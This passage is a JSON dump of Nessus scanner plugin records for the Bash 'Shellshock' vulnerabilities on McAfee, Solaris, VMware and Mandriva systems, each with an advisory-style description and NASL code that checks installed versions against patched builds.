script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:email_gateway\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mcafee_email_gateway_version.nbin\");\n script_require_keys(\"Host/McAfeeSMG/name\", \"Host/McAfeeSMG/version\", \"Host/McAfeeSMG/patches\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = get_kb_item_or_exit(\"Host/McAfeeSMG/name\");\nversion = get_kb_item_or_exit(\"Host/McAfeeSMG/version\");\npatches = get_kb_item_or_exit(\"Host/McAfeeSMG/patches\");\n\n# Determine fix.\nif (version =~ \"^5\\.6\\.\")\n{\n fix = \"5.6.2964.108\";\n hotfix = \"5.6h1010267\";\n}\nelse if (version =~ \"^7\\.0\\.\")\n{\n fix = \"7.0.2934.111\";\n hotfix = \"7.0.5h1010264\";\n}\nelse if (version =~ \"^7\\.5\\.\")\n{\n fix = \"7.5.3088.112\";\n hotfix = \"7.5.4h1010253\";\n}\nelse if (version =~ \"^7\\.6\\.\")\n{\n fix = \"7.6.3044.119\";\n hotfix = \"7.6.2h1010246\";\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1 && hotfix >!< patches)\n{\n port = 0;\n\n if (report_verbosity > 0)\n {\n report = '\\n' + app_name + ' ' + version + ' is missing patch ' + hotfix + '.\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port:port);\n exit(0);\n}\nelse audit(AUDIT_PATCH_INSTALLED, hotfix, app_name, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:40:10", "description": "The remote Solaris system is missing necessary patches to address security updates :\n\n - GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka 'ShellShock.' NOTE:\n the original fix for this issue was incorrect;\n CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix. (CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse function definitions in the values of environment variables, which allows remote attackers to execute arbitrary commands via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271, CVE-2014-7169, and CVE-2014-6277. (CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The redirection implementation in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via crafted use of here documents, aka the 'redir_stack' issue. (CVE-2014-7186)\n\n - Off-by-one error in the read_token_word function in parse.y in GNU Bash through 4.3 bash43-026 allows remote attackers to cause a denial of service (out-of-bounds array access and application crash) or possibly have unspecified other impact via deeply nested for loops, aka the 'word_lineno' issue. (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2015-01-19T00:00:00", "type": "nessus", "title": "Oracle Solaris Third-Party Patch Update : bash (multiple_vulnerabilities_in_bash) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:oracle:solaris:11.2", "p-cpe:/a:oracle:solaris:bash"], "id": "SOLARIS11_BASH_20141031.NASL", "href": "https://www.tenable.com/plugins/nessus/80590", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Oracle Third Party software advisories.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80590);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Solaris Third-Party Patch Update : bash (multiple_vulnerabilities_in_bash) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Solaris system is missing a security patch for third-party\nsoftware.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Solaris system is missing necessary patches to address\nsecurity updates :\n\n - GNU Bash through 4.3 processes trailing strings after\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary code via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution, aka 'ShellShock.' NOTE:\n the original fix for this issue was incorrect;\n CVE-2014-7169 has been assigned to cover the\n vulnerability that is still present after the incorrect\n fix. (CVE-2014-6271)\n\n - GNU Bash through 4.3 bash43-026 does not properly parse\n function definitions in the values of environment\n variables, which allows remote attackers to execute\n arbitrary commands via a crafted environment, as\n demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid\n modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which\n setting the environment occurs across a privilege\n boundary from Bash execution. NOTE: this vulnerability\n exists because of an incomplete fix for CVE-2014-6271,\n CVE-2014-7169, and CVE-2014-6277. (CVE-2014-6278)\n\n - GNU Bash through 4.3 bash43-025 processes trailing\n strings after certain malformed function definitions in\n the values of environment variables, which allows remote\n attackers to write to files or possibly have unknown\n other impact via a crafted environment, as demonstrated\n by vectors involving the ForceCommand feature in OpenSSH\n sshd, the mod_cgi and mod_cgid modules in the Apache\n HTTP Server, scripts executed by unspecified DHCP\n clients, and other situations in which setting the\n environment occurs across a privilege boundary from Bash\n execution. NOTE: this vulnerability exists because of an\n incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The redirection implementation in parse.y in GNU Bash\n through 4.3 bash43-026 allows remote attackers to cause\n a denial of service (out-of-bounds array access and\n application crash) or possibly have unspecified other\n impact via crafted use of here documents, aka the\n 'redir_stack' issue. (CVE-2014-7186)\n\n - Off-by-one error in the read_token_word function in\n parse.y in GNU Bash through 4.3 bash43-026 allows remote\n attackers to cause a denial of service (out-of-bounds\n array access and application crash) or possibly have\n unspecified other impact via deeply nested for loops,\n aka the 'word_lineno' issue. (CVE-2014-7187)\");\n # https://www.oracle.com/technetwork/topics/security/thirdparty-patch-map-1482893.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4a913f44\");\n # https://blogs.oracle.com/sunsecurity/multiple-vulnerabilities-in-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e15b61cf\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Solaris 11.2.2.8.0.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:11.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris11/release\", \"Host/Solaris11/pkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Solaris11/release\");\nif (isnull(release)) audit(AUDIT_OS_NOT, \"Solaris11\");\npkg_list = solaris_pkg_list_leaves();\nif (isnull (pkg_list)) audit(AUDIT_PACKAGE_LIST_MISSING, \"Solaris pkg-list packages\");\n\nif (empty_or_null(egrep(string:pkg_list, pattern:\"^bash$\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n\nflag = 0;\n\nif (solaris_check_release(release:\"0.5.11-0.175.2.2.0.8.0\", sru:\"SRU 11.2.2.8.0\") > 0) flag++;\n\nif (flag)\n{\n error_extra = 'Affected package : bash\\n' + solaris_get_report2();\n error_extra = ereg_replace(pattern:\"version\", replace:\"OS version\", string:error_extra);\n if (report_verbosity > 0) security_hole(port:0, extra:error_extra);\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"bash\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-07T18:58:14", "description": "The VMware vSphere Replication installed on the remote host is version 5.1.x prior to 5.1.2.2, 5.5.x prior to 5.5.1.3, 5.6.x prior to 5.6.0.2, or 5.8.x prior to 5.8.0.1. It is, therefore, affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system", "cvss3": {"score": null, "vector": null}, "published": "2014-10-31T00:00:00", "type": "nessus", "title": "VMware vSphere Replication Bash Environment Variable Command Injection Vulnerability (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["x-cpe:/a:vmware:vsphere_replication"], "id": "VMWARE_VSPHERE_REPLICATION_VMSA_2014_0010.NASL", "href": "https://www.tenable.com/plugins/nessus/78771", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78771);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"EDB-ID\", value:\"34860\");\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware vSphere Replication Bash Environment Variable Command Injection Vulnerability (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization appliance installed that is\naffected by Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware vSphere Replication installed on the remote host is version\n5.1.x prior to 5.1.2.2, 5.5.x prior to 5.5.1.3, 5.6.x prior to\n5.6.0.2, or 5.8.x prior to 5.8.0.1. It is, therefore, affected by a\ncommand injection vulnerability in GNU Bash known as Shellshock, which\nis due to the processing of trailing strings after function\ndefinitions in the values of environment variables. This allows a\nremote attacker to execute arbitrary code via environment variable\nmanipulation depending on the configuration of the system\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to vSphere Replication 5.1.2.2 / 5.5.1.3 / 5.6.0.2 / 5.8.0.1\nor later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:vmware:vsphere_replication\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vSphere Replication/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/VMware vSphere Replication/Version\");\nverui = get_kb_item_or_exit(\"Host/VMware vSphere Replication/VerUI\");\nbuild = get_kb_item_or_exit(\"Host/VMware vSphere Replication/Build\");\n\nfix = '';\n\nif (version =~ '^5\\\\.1\\\\.' && int(build) < 2170306) fix = '5.1.2 Build 2170306';\nelse if (version =~ '^5\\\\.5\\\\.' && int(build) < 2170307) fix = '5.5.1 Build 2170307';\nelse if (version =~ '^5\\\\.6\\\\.' && int(build) < 2172161) fix = '5.6.0 Build 2172161';\nelse if (version =~ '^5\\\\.8\\\\.' && int(build) < 2170514) fix = '5.8.0 Build 2170514';\n\nif (!empty(fix))\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + verui +\n '\\n Fixed version : ' + fix + \n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vSphere Replication', verui);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:56:17", "description": "The remote VMware ESX host is affected by multiple vulnerabilities in the Bash shell :\n\n - A command injection vulnerability exists in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. (CVE-2014-6271, CVE-2014-7169, CVE-2014-6277, CVE-2014-6278)\n\n - A out-of-bounds read error exists in the redirection implementation in file parse.y when evaluating untrusted input during stacked redirects handling. A remote attacker can exploit this to cause a denial of service or possibly have other unspecified impact.\n (CVE-2014-7186)\n\n - An off-by-one overflow condition exists in the read_token_word() function in file parse.y when handling deeply nested flow control structures. A remote attacker can exploit this, by using deeply nested for-loops, to cause a denial of service or possibly execute arbitrary code. (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2015-12-30T00:00:00", "type": "nessus", "title": "VMware ESX Multiple Bash Vulnerabilities (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:vmware:esx:4.0", "cpe:/o:vmware:esx:4.1"], "id": "VMWARE_VMSA-2014-0010_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/87680", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87680);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware ESX Multiple Bash Vulnerabilities (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESX host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESX host is affected by multiple vulnerabilities \nin the Bash shell :\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock. The vulnerability is due to the\n processing of trailing strings after function\n definitions in the values of environment variables. This\n allows a remote attacker to execute arbitrary code via\n environment variable manipulation depending on the\n configuration of the system. (CVE-2014-6271,\n CVE-2014-7169, CVE-2014-6277, CVE-2014-6278)\n\n - A out-of-bounds read error exists in the redirection\n implementation in file parse.y when evaluating\n untrusted input during stacked redirects handling. A\n remote attacker can exploit this to cause a denial of\n service or possibly have other unspecified impact.\n (CVE-2014-7186)\n\n - An off-by-one overflow condition exists in the\n read_token_word() function in file parse.y when handling\n deeply nested flow control structures. A remote attacker\n can exploit this, by using deeply nested for-loops, to\n cause a denial of service or possibly execute arbitrary\n code. (CVE-2014-7187)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2014/000278.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n # http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e40f2f5a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory that\npertains to ESX version 4.0 / 4.1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.1\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Host/VMware/vsphere\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\nport = get_kb_item_or_exit(\"Host/VMware/vsphere\");\n\npci = FALSE;\npci = get_kb_item(\"Settings/PCI_DSS\");\n\nif (\"ESX \" >!< rel)\n audit(AUDIT_OS_NOT, \"VMware ESX\");\n\nesx = \"ESXi\";\n\nextract = eregmatch(pattern:\"^ESX (\\d\\.\\d).*$\", string:ver);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_APP_VER, \"VMware ESX\");\nelse\n ver = extract[1];\n\n# fixed build numbers are the same for ESX and ESXi\nfixes = make_array(\n \"4.0\", \"2167889\",\n \"4.1\", \"See vendor\"\n );\n\nfix = FALSE;\nfix = fixes[ver];\n\n# get the build before checking the fix for the most complete audit trail\nextract = eregmatch(pattern:'^VMware ESX.* build-([0-9]+)$', string:rel);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_BUILD, \"VMware ESX\", ver);\n\nbuild = int(extract[1]);\n\n# if there is no fix in the array, fix is FALSE\nif(!fix)\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESX\", ver, build);\n\nif (!pci && fix == \"See vendor\")\n audit(AUDIT_PCI);\n\nvuln = FALSE;\n\n# This is for PCI reporting\nif (pci && fix == \"See vendor\")\n vuln = TRUE;\nelse if (build < fix )\n vuln = TRUE;\n\nif (vuln)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Version : ESX ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else\n security_hole(port:port);\n\n exit(0);\n}\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESX\", ver, build);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T14:43:00", "description": "Updated bash packages fix security vulnerability :\n\nA flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue (CVE-2014-6271).\n\nThis vulnerability can be exposed and exploited through several other pieces of software and should be considered highly critical. Please refer to the RedHat Knowledge Base article and blog post for more information.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue (CVE-2014-7169).\n\nBash has been updated to version 4.2 patch level 50, which further mitigates ShellShock-type vulnerabilities. Two such issues have already been discovered (CVE-2014-6277, CVE-2014-6278).\n\nSee the RedHat article on the backward-incompatible changes introduced by the latest patch, caused by adding prefixes and suffixes to the variable names used for exporting functions. Note that the RedHat article mentions these variable names will have parentheses '()' at the end of their names, however, the latest upstream patch uses two percent signs '%%' at the end instead.\n\nTwo other unrelated security issues in the parser have also been fixed in this update (CVE-2014-7186, CVE-2014-7187).\n\nAll users and sysadmins are advised to update their bash package immediately.", "cvss3": {"score": null, "vector": null}, "published": "2015-03-30T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : bash (MDVSA-2015:164)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:bash", "p-cpe:/a:mandriva:linux:bash-doc", "cpe:/o:mandriva:business_server:2"], "id": "MANDRIVA_MDVSA-2015-164.NASL", "href": "https://www.tenable.com/plugins/nessus/82417", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:164. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82417);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"MDVSA\", value:\"2015:164\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Mandriva Linux Security Advisory : bash (MDVSA-2015:164)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated bash packages fix security vulnerability :\n\nA flaw was found in the way Bash evaluated certain specially crafted\nenvironment variables. An attacker could use this flaw to override or\nbypass environment restrictions to execute shell commands. Certain\nservices and applications allow remote unauthenticated attackers to\nprovide environment variables, allowing them to exploit this issue\n(CVE-2014-6271).\n\nThis vulnerability can be exposed and exploited through several other\npieces of software and should be considered highly critical. Please\nrefer to the RedHat Knowledge Base article and blog post for more\ninformation.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue\n(CVE-2014-7169).\n\nBash has been updated to version 4.2 patch level 50, which further\nmitigates ShellShock-type vulnerabilities. Two such issues have\nalready been discovered (CVE-2014-6277, CVE-2014-6278).\n\nSee the RedHat article on the backward-incompatible changes 